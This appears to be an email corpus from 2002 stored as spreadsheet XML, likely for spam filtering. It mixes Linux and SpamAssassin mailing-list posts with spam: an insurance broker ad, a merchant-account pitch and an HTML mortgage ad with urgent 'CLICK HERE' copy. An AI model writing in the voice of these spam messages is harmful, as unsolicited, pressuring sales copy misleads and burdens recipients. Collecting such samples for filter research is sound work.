                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Preferred Plus =
 Smoker&lt;/b&gt; category=20
                   for healthy Cigarette Smokers.&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;
                   &lt;font size=3D"2"&gt;&lt;b&gt;Aviation:&lt;/b&gt; Preferred rates=20
                   may be offered to commercial pilots and most student =
 and private=20
                   pilots who fly up to 200 hours per year, regardless of =
 whether=20
                   helicopters or fixed wing aircraft are flown.&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Treadmills not =
 required&lt;/b&gt;=20
                   for preferred rates for face amounts within our =
 capacity limits&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Improved =
 Ratings&lt;/b&gt; for Prostate=20
                   Cancer, Hepatitis B &amp;amp; C&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt; &lt;b&gt;Heart attack?&lt;/b&gt; =
 Consider=20
                   Prudential as soon as the prospect returns to normal =
 activities&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Liberal Build =
 Tables&lt;/b&gt; to=20
                   qualify for Preferred rates&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2"&gt;&lt;b&gt;&lt;font color=3D"#000066"&gt;INCREASED =
 CAPACITY&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;$70 million =
 capacity&lt;/b&gt; without=20
                   the need to discuss a risk with =
 reinsurers.&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Facultative =
 reinsurance&lt;/b&gt;=20
                   may be available for cases in excess of $70 =
 million.&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;hr width=3D"90%" size=3D"1" color=3D"#000000"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font size=3D"2"&gt;&lt;b&gt;Click our logo for the BGA nearest =
 you!&lt;br&gt;
             &lt;a href=3D"http://www.insiq.com/resdir/special/nbc/"&gt;&lt;img =
 src=3D"http://iiq.us/images/nbc/20020701-4.jpg" width=3D"528" =
 height=3D"86" alt=3D"Click here for the NBC BGA Locator!" =
 border=3D"0"&gt;&lt;/a&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;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colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20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&lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"jdarnell@sourcebrok.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"NBC Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/nbc/20020701-3.gif" =
 width=3D"241" height=3D"149" alt=3D"National Brokerage Consortium"&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;font size=3D"1"&gt;* Minimum Premium to Endow is a =
 hypothetical, non-guaranteed=20
             premium that, based on current charges and the current =
 interest rate,=20
             would keep the policy in force to age 100. Interest rates =
 and charges=20
             will change over time, as will the Minimum Premium to Endow. =
 These=20
             premiums are shown as hypothetical figures based on the =
 stated assumptions=20
             and are shown for comparative purposes only. The actual =
 premium needed=20
             to keep the policy in force is based on actual results and =
 may be=20
             higher or lower. ** All guarantees are based on the =
 claims-paying=20
             ability of the issuer. &lt;br&gt;
             + PruLife Universal Protector is issued by Pruco Life =
 Insurance Company.=20
             PruLife Universal Plus also is issued by Pruco Life =
 Insurance Company=20
             in all states except New Jersey and New York, where it is =
 issued by=20
             Pruco Life Insurance Company of New Jersey, both Prudential =
 Financial,=20
             Inc. companies located at 213 Washington Street, Newark, NJ =
 07102-2992.=20
             Each is solely responsible for its own financial condition =
 and contractual=20
             obligations. &lt;br&gt;
             ++ Available on contracts dated Jan. 1, 2002 &amp;amp; later. =
 Not available=20
             in New York &amp;amp; New Jersey.&lt;br&gt;
             Prudential Financial is a service mark of The Prudential =
 Insurance=20
             Company of America, Newark, NJ and its affiliates. For =
 financial professional=20
             use only. Not for use with the public. &lt;br&gt;
             IFS-A072238 Ed. 7/2002 Exp. 12/2003&lt;/font&gt;&lt;/td&gt;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href=3D"http://www.InsuranceIQ.com/optout"&gt;=20
         http://www.InsuranceIQ.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_C2C45_01C258E6.DAEEA330--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;Chris Garrigues said:
  &gt; Done.  I also eliminated the msgs variable on the theory that simpler is
  &gt; 
  &gt; better (I spent a lot of time hacking out the underbrush in exmh while 
  &gt; working on the sequences window).
 Just a big *thank you* to Chris for being willing to dive in and get
 very messy.  The sequence management code is some of the very oldest
 in exmh, and surely suffered as features were added over several years.
 When this stabilizes, it will be a great excuse for a 2.6 release.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</si>
  <si>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Subject: Re: [ILUG] rpm dependencies
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
 &gt;  The only way you can resolve this, to my knowledge is to download the
 &gt; original libvorbis rpm and the new one. Remove the old one, then do:
 &gt; 
 &gt;  rpm -Uvh libvorbis-*
 &gt; 
 &gt;  RPM then assumes that you want both versions installed at the same time,
 &gt; and does so. Why you can't do this after you have one library already
 &gt; installed is beyond me.
 Does using the --oldpackage flag help your pain, or is your pain caused 
 by "Obsoletes" flags?
 Cheers,
 Waider.
 -- 
 waider@waider.ie / Yes, it /is/ very personal of me
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NYT discovers Linux in late 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85518715
 Date: Not supplied
 NYT op-ed piece about this newfangled OS called Linux and how it is developed 
 using something called the "open source" method. This is the paper to go to for 
 breaking news, folks. Link[1] Discuss[2] _(Thanks, Dave!)_
 [1] http://www.nytimes.com/2002/09/18/opinion/18WED2.html
 [2] http://www.quicktopic.com/16/H/VgggkvaadJKnu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: netatalk-1.5.5-1rh7
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi folks, I just uploaded RPMS of the new netatalk 1.5.5 released 
 yesterday, thought folks here might be interested.  This release fixes a 
 nastygram in saving files via Illustrator that I personally have been 
 waiting for....
    http://ftp.falsehope.com/home/tengel/netatalk/
 (will be mirrored on rpmfind.net by tomorrow, usually).
 -te
 -- 
 Troy Engel, Systems Engineer
 Cool as the other side of the pillow
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On 2 Sep 2002, RossO wrote:
 &gt; John Waylan (who was interviewed in Wired a few years back) pulled out a
 &gt; 14.4 second run in the quarter mile (91mph), on a battery pack that
 &gt; hasn't been broken in yet. He expects to break his record next year
 &gt; topping his 13.1sec/99mph run a couple of years ago. He's shooting for a
 &gt; 12 second run.
 Battery pack, huh what???
 You dont use batteries for a 1/4 mile run, you use capacitors. MANY times
 the energy density, and you can get the energy out fast enough. Note that
 the battery packs are fully swapped out for recharging after each run
 anyway, just like a gas dragster is refueled, so this wouldnt be cheating.
 200 MPH should be no problem.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Redhat 8.0
</t>
  </si>
  <si>
    <t xml:space="preserve">I just saw the ISOs on an internal server here and was tempted....
 	D.
 -----Original Message-----
 From: John P. Looney [mailto:valen@tuatha.org] 
 Sent: Monday, September 02, 2002 3:45 PM
 To: HAMILTON,DAVID (HP-Ireland,ex2)
 Cc: 'ilug@linux.ie'
 Subject: Re: [ILUG] Redhat 8.0
 On Mon, Sep 02, 2002 at 03:22:54PM +0100, HAMILTON,DAVID (HP-Ireland,ex2)
 mentioned:
 &gt; Does anyone know when Redhat 8.0 is going to be released?
 &gt; I have seen some ISO images of it around and I am trying to work out 
 &gt; if it's near release.
  Null, the third beta was out last week.
  It'll be an interesting release. Gnome 2.0, and GCC 3.2 - both very new,
 large projects.
  I'd not be putting it on any production machines for a while...
  Though many say "RedHat X.0 releases are rubbish" - it's worth baring in
 mind that they jump a release when the underlying archtechture changes, not
 just the installer, so they are .0 for a reason.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">[Tim]
 &gt; I never used ConfigParser before, but I read that its read() 
 &gt; method silently ignores files that don't exist.  If 'bayes.ini'
 &gt; isn't found, *none* of the options will be defined. ...
 Note that I since got rid of bayes.ini (it's embedded in Options.py 
 now), so search-path issues won't burn you here anymore.  The intended 
 way to customize the tokenizer and testers is via creating your own 
 bayescustomize.ini.  You'll get burned by search-path issues wrt that 
 instead now &lt;0.7 wink&gt;.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Something EVERY Business Needs! [wxv4m]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Something EVERY business needs, a Merchant Account!
 A Merchant Account is the hardware and software which
 gives you the ability to allow customers to pay using
 any credit card such as Visa, Master Card, American
 Express, Discover etc., and other forms of payment such
 as e-Checks, Debit Cards and secure Internet based
 payment.
 We offer several different packages, any of which can
 be custom tailored to your needs. Services are currently
 provided to the United States and Canada.
 To make a purchase or ask questions regarding our
 services, please reply to this email with your full
 name, phone number (with area/country code) and if 
 possible a good time to call. You are under no
 obligations. A sales rep will contact you and will be
 able to address any of your questions or needs.
 Thank you
 ***
 To be removed from our mailing list, reply to this
 email with the word 'Remove' in the subject line.
 ***
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 1008] SpamAssassin does not work with Glance for
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1008
 jm@jmason.org changed:
            What    |Removed                     |Added
 ----------------------------------------------------------------------------
              Status|NEW                         |RESOLVED
          Resolution|                            |INVALID
 ------- Additional Comments From jm@jmason.org  2002-09-21 16:36 -------
 Hi David --
 I'm afraid this bug-tracking system is only used for the open-source
 SpamAssassin (the UNIX one ;).   You need to talk to somebody
 at deersoft.com instead.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</si>
  <si>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discounted motgages 4924161298765444333
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
            &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;&lt;FONT size=2 PTSIZE="10"&gt;
       &lt;TABLE 
       style="BORDER-RIGHT: #006600 12px double; PADDING-RIGHT: 4px; BORDER-TOP: #006600 12px double; PADDING-LEFT: 4px; PADDING-BOTTOM: 1px; BORDER-LEFT: #006600 12px double; PADDING-TOP: 1px; BORDER-BOTTOM: #006600 12px double; BORDER-COLLAPSE: collapse" 
       borderColor=#111111 height=338 cellSpacing=0 borderColorDark=#ffffff 
       cellPadding=0 width=539 borderColorLight=#ffffff border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=4 height=423&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD 
           style="BORDER-RIGHT: 0px solid; BORDER-TOP: 0px solid; BORDER-LEFT: 0px solid; BORDER-BOTTOM: 0px solid" 
           vAlign=top align=left width=535 height=423&gt;
             &lt;TABLE style="BORDER-COLLAPSE: collapse" borderColor=#111111 
             cellSpacing=0 cellPadding=4 width="95%" bgColor=#ffffff border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top align=right height=424&gt;
                   &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
                     &lt;TR&gt;
                       &lt;TD&gt;
                         &lt;DIV align=left&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=2&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         color=#000000 size=2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
                         color=#000000&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Dear 
                         Homeowner,&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
                         &lt;DIV align=left&gt;&amp;nbsp;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif"&gt;*&lt;/FONT&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         color=#ff0000&gt;6.25% 30 Yr Fixed Rate 
                         Mortgage&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD&gt;
                         &lt;DIV align=left&gt;&lt;FONT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&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;TABLE style="POSITION: relative; BORDER-COLLAPSE: collapse" 
                   borderColor=#111111 height=1 cellSpacing=0 cellPadding=0 
                   width=504 border=0&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=top width=325 height=1&gt;
                         &lt;DIV align=center&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=2&gt;&lt;B&gt;&lt;BR&gt;&lt;/A&gt;&lt;A 
                         href="http://www.status100.com/mortgage/index34.html" 
                         target=new_win&gt;Click Here for a Free 
                         Quote!&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;A 
                         href="http://www.status100.com/mortgage/index34.html" 
                         target=new_win&gt; &lt;/A&gt;&lt;/DIV&gt;
                         &lt;P&gt;&lt;B&gt;&lt;FONT face=Verdana,Arial,Helvetica,sans-serif 
                         size=2&gt;Lock In YOUR LOW FIXED RATE TODAY&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
                         &lt;DL&gt;
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;NO COST 
                           OUT OF POCKET&lt;/FONT&gt;&lt;/B&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;NO 
                           OBLIGATION&lt;/B&gt;&lt;/FONT&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;FREE 
                           CONSULTATION&lt;/B&gt;&lt;/FONT&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;ALL 
                           CREDIT GRADES ACCEPTED&lt;/B&gt;&lt;/FONT&gt; &lt;/DD&gt;&lt;/DL&gt;
                         &lt;DIV align=center&gt;&lt;FONT 
                         face=Verdana,Arial,Helvetica,sans-serif color=red 
                         size=2&gt;&lt;B&gt;&lt;A 
                         href="http://www.status100.com/mortgage/index34.html"&gt;Rates as 
                         low as 6.25% won't stay this low forever CLICK 
                         HERE&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&amp;nbsp;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&lt;FONT size=2 PTSIZE="10"&gt;&lt;B&gt;&lt;FONT 
                         style="FONT-SIZE: 6pt" 
                         face=Verdana,Arial,Helvetica,sans-serif&gt;* based on 
                         mortgage rate as of 5-15-02 as low as 6.25% see lender 
                         for details&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;
                       &lt;TD vAlign=top width=4 height=1&gt;
                         &lt;DIV align=right&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/TD&gt;
                       &lt;TD borderColor=#006600 width=175 bgColor=#ffffff 
 height=1&gt;
                         &lt;H1&gt;&lt;SPAN style="VERTICAL-ALIGN: middle"&gt;&lt;FONT 
                         style="FONT-SIZE: 200px" face=Webdings color=#006600&gt;&lt;A 
                         href="http://www.status100.com/mortgage/index34.html"&gt;&lt;FONT 
                         color=#006600&gt;H&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/H1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;TABLE cellSpacing=0 cellPadding=3 width=472 border=0&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD colSpan=2 height=64&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;&lt;B&gt;
                         &lt;TABLE height=38 cellSpacing=2 cellPadding=0 width=482 
                         border=0&gt;
                           &lt;TBODY&gt;
                           &lt;TR&gt;
                             &lt;TD 
                             style="BORDER-RIGHT: 0px solid; BORDER-TOP: 0px solid; BORDER-LEFT: 0px solid; BORDER-BOTTOM: 0px solid" 
                             width=327 height=36&gt;&lt;FONT 
                               face=Verdana,Arial,Helvetica,sans-serif 
                               size=2&gt;Apply now and one of our lending partners 
                               will get back to you within 48 
                               hours.&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT style="FONT-SIZE: 6pt" 
                               face=Verdana,Arial,Helvetica,sans-serif&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/FONT&gt;&lt;FONT 
                             face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;
                             &lt;TD style="BORDER-LEFT: 1px solid" width=141 
                             bgColor=#ff0000 height=36&gt;
                               &lt;P align=center&gt;&lt;B&gt;&lt;FONT color=#ffffff size=4&gt;&lt;A 
                               style="TEXT-DECORATION: none" 
                               href="http://www.status100.com/mortgage/index34.html"&gt;&lt;FONT 
                               color=#ffffff&gt;CLICK 
                             HERE!&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;
               &lt;/TR&gt;
             &lt;/TABLE&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;complete name removing system at website.
 &lt;p&gt;
 &lt;/html&gt;
 4924161298765444333
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Seeing is believing
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655716,215/
 Date: 2002-10-08T03:30:50+01:00
 *Feature: *She has loved clothes with a passion all her life. And yet acclaimed 
 author *Linda Grant* has never been to the collections - until now. So what 
 does she make of the Paris shows?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] results of scorer evaluation
</t>
  </si>
  <si>
    <t xml:space="preserve">Daniel Quinlan wrote:
 DQ&gt; Before we release, it'd be great if someone could test a few
 DQ&gt; additional score ranges.  Maybe we can lower FPs a bit more.  :-)
 I don't think there's much more room for lowering FPs left which the GA can 
 achieve.  Remember, also, that the AWL will reduce FPs, but its effects aren't 
 factored in to the GA scores.
 The work currently being done on the GA, and comparing different methods of 
 doing the score-setting, is very worthwhile, and extremely useful; however, we 
 really ought to get a release out, since 2.31 is getting decreasingly useful as 
 time goes on.
 The FP/FN rate of 2.40 with pretty well *any* score-setting mechanism will be 
 better than 2.31 -- we can continue with adjusting how the scores are set on the 
 2.41 or 2.50 branches.
 DQ&gt; Something like:
 DQ&gt; 
 DQ&gt;   for (low = -12; low &lt;= -4; low += 2)
 DQ&gt;     for (high = 2; high &lt;= 6; high += 2)
 DQ&gt;       evolve
 You could just allow low and high to be evolved by the GA (within ranges); I'd 
 be enormously surprised if it didn't end up with low=-12 and high=+6, since 
 that'd give the GA the broadest lattitude in setting individual scores.  The 
 issue with fixing low and high is not one of optimization, but rather one of 
 human-based concern that individual scores larger than about +4 are dangerous 
 and liable to generate FPs, and individual scores less than -8 are dangerous and 
 liable to be forged to generate FNs.
 DQ&gt; Maybe even add a nybias loop.
 Adding an nybias loop is not worthwhile -- changing nybias scores will just 
 alter the evaluation function's idea of what the FP:FN ratio should be.
 DQ&gt; &gt; AFAIK there's nothing major hanging out waiting to be checked in 
 DQ&gt; &gt; on b2_4_0 is there?
 DQ&gt; 
 DQ&gt; Nope.
 Great!
 DQ&gt; &gt; I'll be on IM most of today, tomorrow, and monday while cranking 
 DQ&gt; &gt; on the next Deersoft product release (should be a fun one).  Hit 
 DQ&gt; &gt; me at:
 DQ&gt; &gt; 
 DQ&gt; &gt; AIM: hugh3scr
 DQ&gt; &gt; ICQ: 1130120
 DQ&gt; &gt; MSN: craig@stanfordalumni.org
 DQ&gt; &gt; YIM: hughescr
 DQ&gt; 
 DQ&gt; We've been hanging out on IRC at irc.rhizomatic.net on #spamassassin
 DQ&gt; (the timezone difference gets in the way, though).
 I've been searching for that, but I guess the details of where the channel was 
 got lost in the shuffle.
 C
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] expanding a string multiple times
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks to all for the responses,
 more comments below...
 Niall O Broin wrote:
 &gt; On Fri, Aug 16, 2002 at 05:26:33PM +0100, Padraig Brady wrote:
 &gt; 
 &gt; 
 &gt;&gt;How can I repeat a string an arbitrary number
 &gt;&gt;of times in bash/sed/...
 &gt;&gt;
 &gt;&gt;I.E. I'm missing the repeat in the following:
 &gt;&gt;
 &gt;&gt;STRING="&gt; "
 &gt;&gt;NUMBER=3
 &gt;&gt;PREFIX=repeat $STRING $NUMBER
 &gt;&gt;echo $PREFIX
 &gt;&gt;
 &gt;&gt;Pdraig.
 &gt;&gt;p.s. I know how to do it with loops.
 &gt; 
 &gt; 
 &gt; Well, here's a solution using seq and sed - IMHO its a rather dim solution
 &gt; and it definitely dies if STRING contains / (and probably has other ways to
 &gt; die too) and a bash loop would certainly be faster, but you know how to do
 &gt; it with loops :-)
 &gt; 
 &gt; PREFIX=seq -s "" $NUMBER|sed "s/./$STRING/g"_x001b_OA
 clever. A bit more robust is:
 #first param is number of
 #times to repeat second param
 #
 #e.g. quote=`repeat 3 '&gt; '`
 repeat() {
      seq -s , $1 | sed "s[0-9]\{1,\}[,]*$2g"
 }
 btw loops in bash are shit slow! see:
 http://www.iol.ie/~padraiga/readline/
 &gt; And while we're on silly bash questions, is there a way of getting the exit
 &gt; status of a command without using $? i.e. can I do something like
 &gt; 
 &gt; result = some_magic_way_of_quoting(command)
 &gt; 
 &gt; instead of
 &gt; 
 &gt; command
 &gt; result=$?
 &gt; 
 &gt; Note that I'm not looking for backtick or $() substitution, nor arithmetic
 &gt; evaluation as with $[]
 I don't think this is possible.
 thanks,
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[3]: Forged whitelist spam
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Eugen,
 Sunday, August 11, 2002, 2:54:10 PM, you wrote:
 EL&gt; On Sun, 11 Aug 2002 bitbitch@magnesium.net wrote:
 &gt;&gt; You mean like on mac keyboards :-)    Or laptops (which are as damn
 EL&gt; Yeah, I was thinking of the G4 keyboard when I wrote this. Otherwise lousy
 EL&gt; feel and key placement, though. (That's why I'm holding on to my IBM Model
 EL&gt; M Space Saver. Once I get an PS2 to USB converter, I expect it will
 EL&gt; outlive several generations of computer hardware).
 EL&gt; Very good for sticking in USB fobs into, though. CRTs/LCD panels are even 
 EL&gt; better for that, though.
 &gt;&gt; near close to keyboard/usb connection as one can get, without the real
 &gt;&gt; thing)
 EL&gt; I think laptops are largely useless because of the battery and the 
 EL&gt; keyboard issue.
 EL&gt; http://xent.com/mailman/listinfo/fork
 Dunno.. Some of the new Sonys (I'm hunting again for a lappy, as the
 Toshiba I have is a large piece of cow manure)  which promise a 4 hour
 battery life off of ONE battery are pretty damn impressive.  As far as
 the keyboard issue, the Toshiba actually came out with a good
 keyboard, nearly equivalent to most standard keyboards (Not ergonomic,
 alas, but I have a USB happy ergo keyboard I can always plug in if I
 get restless).   I can't imagine surviving at Law school without a
 lappy, but thats just me.
 then again, I don't know what you do with your laptops, Gene :)
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reg Headlines Thursday July 11
</t>
  </si>
  <si>
    <t xml:space="preserve">Today's Headlines from The Register
 -----------------------------------
     To unsubscribe from this daily news update, see the instructions at
     the end of this message.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Software
     Nokia claims Matsushita scalp for Series 60
     We don't know the Finnish for Bill, but it's probably got more vowels than are useful in it...
         http://www.theregister.co.uk/content/4/26126.html
     Microsoft stakes IP claims on OpenGL
     From the We Told You So dept.
         http://www.theregister.co.uk/content/4/26125.html
     Microsoft 'hoovers millions' from UK schools - MP 
     Blizzard descends on per seat licensing
         http://www.theregister.co.uk/content/4/26124.html
     Last minute glitch knocks Win2k SP3 back to summer
     Which in WA can mean many things...
         http://www.theregister.co.uk/content/4/26118.html
     MS to ship 64-bit .NET preview this month
     Here's one we'll prepare later...
         http://www.theregister.co.uk/content/4/26117.html
     Congressman vows Pigopolist legislation
     Cleanup starts here
         http://www.theregister.co.uk/content/4/26112.html
 Personal Hardware
     Dan Technology -  two concerned customers!
